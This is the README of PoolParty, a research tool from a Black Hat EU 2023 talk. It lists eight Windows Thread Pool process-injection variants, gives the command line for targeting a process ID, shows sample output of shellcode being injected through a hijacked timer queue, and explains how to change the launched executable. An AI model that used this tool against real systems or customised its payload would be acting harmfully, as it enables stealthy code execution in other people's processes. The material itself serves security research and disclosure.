PoolParty

A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools

PoolParty Variants

Variant ID   Variant Description
1            Overwrite the start routine of the target worker factory
2            Insert TP_WORK work item to the target process's thread pool
3            Insert TP_WAIT work item to the target process's thread pool
4            Insert TP_IO work item to the target process's thread pool
5            Insert TP_ALPC work item to the target process's thread pool
6            Insert TP_JOB work item to the target process's thread pool
7            Insert TP_DIRECT work item to the target process's thread pool
8            Insert TP_TIMER work item to the target process's thread pool

Usage

PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

Usage Examples

Insert TP_TIMER work item to process ID 1234

>> PoolParty.exe -V 8 -P 1234

[info]    Starting PoolParty attack against process id: 1234
[info]    Retrieved handle to the target process: 00000000000000B8
[info]    Hijacked worker factory handle from the target process: 0000000000000058
[info]    Hijacked timer queue handle from the target process: 0000000000000054
[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
[info]    Written shellcode to the target process
[info]    Retrieved target worker factory basic information
[info]    Created TP_TIMER structure associated with the shellcode
[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info]    Written the specially crafted TP_TIMER structure to the target process
[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info]    PoolParty attack completed successfully

Default Shellcode and Customization

The default shellcode spawns a calculator via the WinExec API.

To customize the executable that is launched, change the path at the end of the g_Shellcode variable in the main.cpp file.

Author - Alon Leviev
